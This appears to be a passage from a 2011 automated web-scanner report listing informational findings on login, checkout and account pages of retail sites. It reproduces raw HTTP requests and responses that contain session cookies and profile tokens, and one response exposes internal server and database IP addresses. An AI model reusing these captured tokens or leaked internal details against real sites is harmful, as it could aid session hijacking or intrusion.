Path:   /uiframework/skins/default/js/shoppingCart.js

Request

GET /uiframework/skins/default/js/shoppingCart.js HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: https://secure.orientaltrading.com/ui/userProfile/processRequest.do?requestURI=displayLogin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; JSESSIONID=sz7tNQ5LLchTqrzz9nrtfknpW1ThvbLMlF1vJ5vfMB2Wpdk8p0s4!-2120161015; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305541001747}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:54 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 10650
Last-Modified: Fri, 06 May 2011 14:08:46 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html

var errorCounter = 0;
var gcErrorMsg = false;
var nextElement;

function getProductDetails(requestURI, productId, sku)
{
document[lookupIdByTagId("frmCategoryLevels")][lookupIdByTagId("reque
...[SNIP]...

23.5. https://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /checkout/

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:22 GMT
Server: Apache
X-server-addr: 192.168.100.7
X-trying: 192.168.100.114
X-mysql: 192.168.100.114
Vary: Accept-Encoding
X-ServerNickName: Mj
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27219

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="https://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="scree
...[SNIP]...

23.6. https://subscriptions.marvel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:33 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:58:34 GMT
ETag: "386-73155680"
Accept-Ranges: bytes
Content-Length: 902
X-ServerNickName: Spidey
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

............ .p.......(............. .................................................................................................KK..................<<..................................KK......TT
...[SNIP]...

23.7. https://www.acehardware.com/include/emailSignup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /include/emailSignup.html

Request

GET /include/emailSignup.html HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: https://www.acehardware.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511353374}; fsr.a=1305511371586

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:55 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 03 Jun 2010 08:45:05 GMT
ETag: "4fc44b-118d-4881c39154640"
Accept-Ranges: bytes
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:55 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Ace
...[SNIP]...

23.8. https://www.armaniexchange.com/pageloading.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /pageloading.html

Request

GET /pageloading.html HTTP/1.1
Host: www.armaniexchange.com
Connection: keep-alive
Referer: https://www.armaniexchange.com/account/login.do?method=view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; s_cc=true; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/account.do%25253Fmethod%25253Dstart%252526nav%25253D%2525252Fcategory%2525252Fid%2525252F100199%2526ot%253DA; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"http://www.armaniexchange.com/category/womens.do","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1305511392054}

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:36 GMT
ETag: "42-a04cb700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:03:35 GMT
Date: Mon, 16 May 2011 02:03:35 GMT
Connection: keep-alive
Content-Length: 66

<html>
<head>
</head>
<body>
Page Loading...
</body>
</html>

23.9. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...

23.10. https://www.footlocker.com/account/default/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default/

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...

23.11. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /images/common/coradiant/!crd_prm!.!cm

Request

GET /images/common/coradiant/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=972739&crd_cnt=0.01&crd_tpb=1305542016332&crd_olt=36042 HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: https://www.footlocker.com/account/default/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 19:18:06 GMT
Accept-Ranges: bytes
Content-Length: 66
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/plain
Date: Mon, 16 May 2011 10:34:14 GMT
Connection: keep-alive

BMB.......>...(...................................................

23.12. https://www.guitarcenter.com/MyAccount/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /MyAccount/Login.aspx

Request

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:11:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 32
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 27444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...

23.13. https://www.orderhouse.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /default.aspx

Request

GET /default.aspx HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:13 GMT
Content-Length: 65618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...

23.14. https://www.orderhouse.com/dp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /dp.aspx

Request

GET /dp.aspx?pgid=-22 HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:44:18 GMT
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...

23.15. https://www.petsmart.com/helpdesk/password-pop-up.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /helpdesk/password-pop-up.jsp

Request

GET /helpdesk/password-pop-up.jsp HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: https://www.petsmart.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542896741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:21:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2874


<HTML><BODY>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>

       
       Lost password
   
   </title>

   <link rel="stylesheet" type="text/css" href="/include/s
...[SNIP]...

23.16. https://www.redcrossstore.org/dp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redcrossstore.org
Path:   /dp.aspx

Request

GET /dp.aspx?pgid=-22&ReturnTo=Cart HTTP/1.1
Host: www.redcrossstore.org
Connection: keep-alive
Referer: https://www.redcrossstore.org/Shopper/ContactInfo.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
